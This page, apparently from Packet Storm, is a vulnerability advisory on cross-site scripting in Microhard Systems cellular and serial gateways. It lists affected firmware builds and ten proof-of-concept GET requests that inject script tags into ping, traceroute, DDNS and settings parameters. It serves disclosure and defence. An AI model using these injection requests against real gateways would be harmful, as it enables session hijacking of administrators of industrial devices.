what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microhard Systems 3G/4G Cellular Ethernet And Serial Gateway XSS

Microhard Systems 3G/4G Cellular Ethernet And Serial Gateway XSS
Posted Jul 16, 2018
Authored by LiquidWorm | Site zeroscience.mk

Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway systems are prone to multiple reflected and stored cross-site scripting vulnerabilities due to a failure to properly sanitize user-supplied input to several parameters that are handled by various servlets. Attackers can exploit this issue to execute arbitrary HTML and script code in a user's browser session. Many versions are affected.

tags | exploit, arbitrary, vulnerability, xss
SHA-256 | 2c2c864e961de08f8e726f2b647913aff2b13bf29b8cce66e3aa650d3bd351e5

Microhard Systems 3G/4G Cellular Ethernet And Serial Gateway XSS

Change Mirror Download

Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway XSS Vulnerabilities


Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036

Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!

The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.

The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!

The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!

The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.

Desc: The application is prone to multiple reflected and stored cross-site scripting
vulnerabilities due to a failure to properly sanitize user-supplied input to several
parameters that are handled by various servlets. Attackers can exploit this issue to
execute arbitrary HTML and script code in a user's browser session.

Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2018-5477
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5477.php


13.03.2018

--


GET /cgi-bin/webif/system-settings.sh?submit=1&hostname="><script>alert(1)</script>&description=IPn4Gb&console_timeout=120&syslog_server=0.0.0.0&syslog_port=514&datetime_mode=sync&datetime_date=2018.03.13&datetime_time=06%3a39%3a13&system_timezone=Macedonia&show_TZ=MST7MDT%2cM3.2.0%2cM11.1.0&ntpclient_interval=0&ntp_server_cfg022a58=pool.ntp.org&ntp_port_cfg022a58=123&ntp_server_cfg08954e=testing.org&ntp_port_cfg08954e=123&web_protocol=http&port_v=8080&ssl_port=443&action=Save+Changes HTTP/1.1

GET /cgi-bin/webif/tools-ping.sh?submit=1&count=1"><script>alert(2)</script>&size=56&hostname=192.168.1.1&ping_button=+Fping+ HTTP/1.1

GET /cgi-bin/webif/tools-ping.sh?submit=1&count=4&size=56&hostname=192.168.1.1"><script>alert(3)</script>&ping_button=+Fping+ HTTP/1.1

GET /cgi-bin/webif/tools-ping.sh?submit=1&count=4&size=1337"><script>alert(4)</script>&hostname=192.168.1.1&ping_button=+Fping+ HTTP/1.1

GET /cgi-bin/webif/tools-trace.sh?submit=1&hostname=192.168.1.1"><script>alert(5)</script>&trace_button=+Run+TraceRoute+ HTTP/1.1

GET /cgi-bin/webif/updatedd.sh?submit=1&update_ddns=1&service_ddns=changeip&username_ddns=admin"><script>alert(6)</script>&password_ddns=admin&host_ddns=192.168.1.1&url_ddns=&action=Save+Changes HTTP/1.1

GET /cgi-bin/tool_ping.cgi?text_in_dest_addr=192.168.1.1"><script>alert(7)</script>&text_in_ping_count=1&text_in_pack_size=8&submit_ping=Begin+to+Ping+&text_in_trrt_size=www.google.mk HTTP/1.1

GET /cgi-bin/tool_ping.cgi?text_in_dest_addr=192.168.1.1&text_in_ping_count=1&text_in_pack_size=8"><script>alert(8)</script>&submit_ping=Begin+to+Ping+&text_in_trrt_size=www.google.mk HTTP/1.1

GET /cgi-bin/tool_ping.cgi?text_in_dest_addr=192.168.1.1&text_in_ping_count=1"><script>alert(9)</script>&text_in_pack_size=8&submit_ping=Begin+to+Ping+&text_in_trrt_size=www.google.mk HTTP/1.1

GET /cgi-bin/tool_ping.cgi?text_in_dest_addr=192.168.1.1&text_in_ping_count=1&text_in_pack_size=8&submit_ping=Begin+to+Ping+&text_in_trrt_size=www.google.mk"><script>alert(10)</script> HTTP/1.1
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    13 Files
  • 31
    Aug 31st
    467 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close